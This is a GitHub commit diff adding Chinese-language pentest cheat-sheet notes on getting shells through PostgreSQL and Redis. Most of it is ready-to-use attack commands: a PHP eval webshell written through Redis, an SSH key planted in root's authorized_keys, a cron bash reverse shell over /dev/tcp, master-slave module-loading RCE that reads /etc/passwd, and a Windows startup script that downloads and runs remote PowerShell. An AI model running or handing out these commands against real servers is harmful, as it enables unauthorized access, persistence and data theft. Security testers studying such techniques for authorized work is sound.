File tree Expand file tree Collapse file tree 2 files changed +105
-4
lines changed Expand file tree Collapse file tree 2 files changed +105
-4
lines changed Original file line number Diff line number Diff line change 1- # Mysql
1+ # PostgreSQL
22
33更新时间:2021.9.28
44
1010
1111# GetShell
1212
13+ ### 写shell
14+
15+ - 拥有网站路径写入权限
16+ - 知道网站绝对路径
17+
18+ ```
19+ copy (select '<?php phpinfo();?>') to '/tmp/1.php';
20+ ```
21+
22+
23+
1324
1425
1526
Original file line number Diff line number Diff line change 1- # Mysql
1+ # Redis
22
33更新时间:2021.9.28
44
1212
1313
1414
15+ ### 写webshell
1516
17+ - 已知web的绝对路径
1618
17- # Vuln
19+ - 对应目录具有读写权限
1820
1921
2022
23+ ```
24+ redis-cli -h 192.168.1.154
25+ config set dir /var/www/html
26+ set xxx "\n\n\n<?php@eval($_POST['c']);?>\n\n\n"
27+ config set dbfilename webshell.php
28+ save
29+ ```
2130
2231
23- # Privilege Escalation
2432
33+ ### 写入ssh公钥getshell
2534
35+ - redis服务为root权限
36+ - 允许密钥登录
37+ - linux
38+
39+ ```
40+ config set dir /root/.ssh
41+ config set dbfilename authorized_keys
42+ set xxssh "\n\nssh-rsa xxxxxx\n\n"
43+ save
44+ ```
45+
46+
47+
48+ ### 计划任务反弹shell
49+
50+ - redis服务为root权限启动
51+
52+ ``` bash
53+ config set dir /var/spool/cron/
54+ config set dbfilename root
55+ set xxx " \n\n\n* * * * * bash -i >&/dev/tcp/ip/端口 0>&1\n\n\n"
56+ save
57+ ```
58+
59+
60+
61+ tips:** crontab反弹debian,ubuntu都不行** ,因为他们对计划任务的格式很严格,必须要执行 ` crontab -u root /var/spool/cron/crontabs/root ` 通过语法检查后,才能执行计划任务。
62+
63+
64+
65+ ### 主从rce
66+
67+ - redis服务为root权限启动
68+ - redis 4.x/5.x
69+
70+ 本质上就是加载一个so文件,用来执行命令。和udf差不多。如果本身就可以上传文件的情况下,直接上传so文件加载即可,不用利用主从。主从的意思就是把当前redis设置为备份库,等着把恶意的远程db备份过来,进行加载。
71+
72+ ```
73+ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
74+ cd RedisModules-ExecuteCommand/
75+ make
76+ git clone https://github.com/Ridter/redis-rce
77+ python redis-rce.py -r 192.168.1.154 -L 192.168.1.153 -f module.so
78+ ```
79+
80+ ```
81+ https://github.com/vulhub/redis-rogue-getshell
82+ 需要python3.0以上
83+ 编译
84+ >cd RedisModulesSDK/
85+ >make
86+ 会在此目录下生成exp.so
87+ 执行命令
88+ >python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
89+ ```
90+
91+
92+
93+ 还可以写无损文件
94+
95+ https://github.com/r35tart/RedisWriteFile
96+
97+
98+
99+ 还可以主从复制覆写shadow
100+
101+
102+
103+ ### windows系统主从利用
104+
105+ - 需要启动项目录的写入权限
106+ - 服务器需要重启
107+
108+
109+
110+ ```
111+ config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
112+ config set dbfilename shell.bat
113+ set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.2/shell.ps1');xx.ps1\"\r\n\r\n"
114+ save
115+ ```
26116
27117
28118
You can’t perform that action at this time.
0 commit comments